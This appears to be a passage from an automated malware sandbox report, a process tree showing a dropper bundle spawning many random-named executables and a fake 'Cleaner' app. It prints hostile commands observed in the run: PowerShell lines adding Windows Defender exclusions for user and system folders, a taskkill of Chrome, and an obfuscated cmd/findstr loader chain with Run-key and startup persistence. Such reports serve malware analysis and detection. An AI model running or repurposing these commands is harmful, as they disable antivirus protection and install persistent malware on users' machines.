                                                                                                                                                                                                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:4560
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:2640
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:5972
                                                                                                                                                                                                    • C:\Users\Admin\Documents\lysMWZF42A_tzg2EDyDE9mKZ.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\lysMWZF42A_tzg2EDyDE9mKZ.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:4908
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 660
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:6604
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 664
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:5640
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 632
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:5156
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 708
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:6212
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1120
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:5852
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:2324
                                                                                                                                                                                                      • C:\Users\Admin\Documents\HnYWho4oXpaWZLE__Q8rvbNp.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\HnYWho4oXpaWZLE__Q8rvbNp.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:5460
                                                                                                                                                                                                      • C:\Users\Admin\Documents\iVFMxWjEN0iVp0xj8k7u0JOe.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\iVFMxWjEN0iVp0xj8k7u0JOe.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:3732
                                                                                                                                                                                                        • C:\Users\Admin\Documents\iVFMxWjEN0iVp0xj8k7u0JOe.exe
                                                                                                                                                                                                          C:\Users\Admin\Documents\iVFMxWjEN0iVp0xj8k7u0JOe.exe
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:7128
                                                                                                                                                                                                          • C:\Users\Admin\Documents\iVFMxWjEN0iVp0xj8k7u0JOe.exe
                                                                                                                                                                                                            C:\Users\Admin\Documents\iVFMxWjEN0iVp0xj8k7u0JOe.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                            PID:4680
                                                                                                                                                                                                        • C:\Users\Admin\Documents\0tYydSVZGjgOMwhiZq3U0Y9c.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\0tYydSVZGjgOMwhiZq3U0Y9c.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                          PID:6228
                                                                                                                                                                                                        • C:\Users\Admin\Documents\SJD3i8WYzyDmn51A1MFIRf14.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\SJD3i8WYzyDmn51A1MFIRf14.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          PID:6168
                                                                                                                                                                                                        • C:\Users\Admin\Documents\qzvwurm0Wv6_JnNoclsdXU43.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\qzvwurm0Wv6_JnNoclsdXU43.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:5688
                                                                                                                                                                                                            • C:\Users\Admin\Documents\qzvwurm0Wv6_JnNoclsdXU43.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\qzvwurm0Wv6_JnNoclsdXU43.exe" -q
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:6684
                                                                                                                                                                                                            • C:\Users\Admin\Documents\FewjWe9ZZ8bYBvwlbmzRm8_p.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\FewjWe9ZZ8bYBvwlbmzRm8_p.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                              PID:2300
                                                                                                                                                                                                            • C:\Users\Admin\Documents\JNpdHP71kUW3Jg4w16l3SSlZ.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\JNpdHP71kUW3Jg4w16l3SSlZ.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:4072
                                                                                                                                                                                                              • C:\Users\Admin\Documents\JNpdHP71kUW3Jg4w16l3SSlZ.exe
                                                                                                                                                                                                                C:\Users\Admin\Documents\JNpdHP71kUW3Jg4w16l3SSlZ.exe
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:7156
                                                                                                                                                                                                              • C:\Users\Admin\Documents\wiDtKRXmYAWjoeK89GieLFkp.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\wiDtKRXmYAWjoeK89GieLFkp.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:2172
                                                                                                                                                                                                                • C:\Users\Admin\Documents\XXxDwN3bkCbVtfCwR4XWNOXb.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\XXxDwN3bkCbVtfCwR4XWNOXb.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:6436
                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                  PID:1436
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpF3C8_tmp.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\tmpF3C8_tmp.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5944
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:6128
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:6112
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:6632
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                  PID:8120
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                  Esplorarne.exe.com i
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  PID:5996
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                    PID:2184
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                      PID:1060
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                        PID:7760
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                          PID:7356
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                            PID:7696
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                              PID:4808
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                PID:5320
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                  PID:6200
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                    PID:5344
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                      PID:6360
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                          PID:7776
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                            PID:4132
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                              PID:1840
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                23⤵
                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                PID:7392
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                  PID:6844
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                    PID:6072
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                                        PID:6532
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          27⤵
                                                                                                                                                                                                                                                                            PID:7304
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                PID:6792
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  29⤵
                                                                                                                                                                                                                                                                                    PID:3244
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      30⤵
                                                                                                                                                                                                                                                                                        PID:3140
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          31⤵
                                                                                                                                                                                                                                                                                            PID:7536
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                                PID:4360
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                  33⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  PID:7776
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    34⤵
                                                                                                                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                                                                                                                    PID:6276
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                  ping GFBFPSXA -n 30
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                  PID:8144
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:504
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8786518.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\8786518.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:5352
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5227389.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5227389.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:5576
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7120629.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7120629.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                            PID:64
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5367167.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5367167.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:5652
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:4312
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:4472
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                PID:6596
                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    PID:6960
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 6AB519F4F5C72ABF7FF33D70BDF4A55C C
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:6752
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 7A5ECC76EE904B65BD3F18E6841446BE C
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:6040
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding EA2E4EBD2D8E2B5B28AA9E195EAA3DCA C
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:4084
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 9CA0B9164102820C48C5DE3DAAD7D53A
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:6356
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                      PID:8944
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                        PID:6296
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:6004
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffa5395dec0,0x7ffa5395ded0,0x7ffa5395dee0
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:7952
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=1708 /prefetch:8
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:8352
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                PID:8920
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=2188 /prefetch:8
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:8696
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:1
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                  PID:6316
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
